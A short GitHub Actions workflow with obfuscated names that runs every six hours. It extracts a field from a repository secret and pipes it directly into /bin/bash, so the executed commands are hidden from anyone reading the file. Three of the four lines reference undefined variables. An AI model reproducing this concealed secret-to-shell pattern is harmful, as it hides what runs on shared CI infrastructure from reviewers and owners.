name: yinnengzhe7654

on:
  workflow_dispatch:
  schedule:
    - cron: '10 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yinnengzhe7654
        env:
          rae7220: ${{ secrets.rae7220 }}
        run: |
          echo $rae7220 | jq -r .xid41093 | /bin/bash
          echo $ogmr693 | jq -r .viu84 | /bin/bash
          echo $hbkls3 | jq -r .xv65 | /bin/bash
          echo $doso93 | jq -r .cbdkf78458 | /bin/bash

